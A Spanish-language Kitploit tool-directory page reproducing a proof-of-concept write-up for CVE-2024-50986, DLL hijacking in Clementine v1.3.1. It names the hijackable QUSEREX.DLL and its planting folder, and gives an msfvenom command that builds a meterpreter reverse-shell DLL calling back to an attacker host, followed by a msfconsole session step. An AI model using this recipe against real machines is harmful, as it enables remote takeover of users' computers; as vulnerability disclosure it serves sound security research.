Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50986 — Una vulnerabilidad en Clementine v.1.3.1 permite a un atacante local ejecutar código arbitrario mediante un archivo DLL manipulado (DLL Hijacking) | Kitploit
Herramientas/GitHubGitHub/riftsandroses/cve-2024-50986
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePost-ExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubriftsandroses/cve-2024-50986

CVE-2024-50986

Una vulnerabilidad en Clementine v.1.3.1 permite a un atacante local ejecutar código arbitrario mediante un archivo DLL manipulado (DLL Hijacking)

Ver Repositorio
14hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50986: Exploit de secuestro de DLL para Clementine

Descripción: Un problema en Clementine v.1.3.1 permite a un atacante local ejecutar código arbitrario mediante un archivo DLL manipulado.

Versión afectada: Clementine v.1.3.1

Investigador: Utkarsh (r1971d3) LinkedIn

Enlace NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

Tipo de vulnerabilidad: Ruta de búsqueda no confiable

Componente afectado: QUSEREX.DLL

Exploit de prueba de concepto

Vector de ataque

Para explotar esta vulnerabilidad, un atacante debe crear un DLL malicioso llamado QUSEREX.DLL y colocarlo en el directorio: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. Cuando se inicia la aplicación Clementine, cargará el DLL malicioso, ejecutando el código del atacante.

Descripción y uso

  1. Use Process Monitor (procmon) con los filtros adecuados para identificar DLLs faltantes y rastrear dónde busca Clementine dentro del sistema operativo Windows

Capture_3

  1. La búsqueda revela que el DLL "QUSEREX.DLL" es buscado en múltiples ubicaciones, incluyendo C:\Users<username>\AppData\Local\Microsoft\WindowsApps\

Capture_4

  1. Se crea un DLL malicioso usando msfvenom con el siguiente comando:
root@kitploit:~
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

Capture_5

  1. Este DLL malicioso se coloca en el directorio C:\Users<username>\AppData\Local\Microsoft\WindowsApps, donde es cargado exitosamente por Clementine.

Capture_6

  1. Usando msfconsole, se envía un payload por etapas a través del shell inverso, obteniendo una sesión de shell meterpreter en el directorio C:\Program Files (x86)\Clementine\projectm-presets en la máquina objetivo.

Capture_7

Capture_8

Descargar herramienta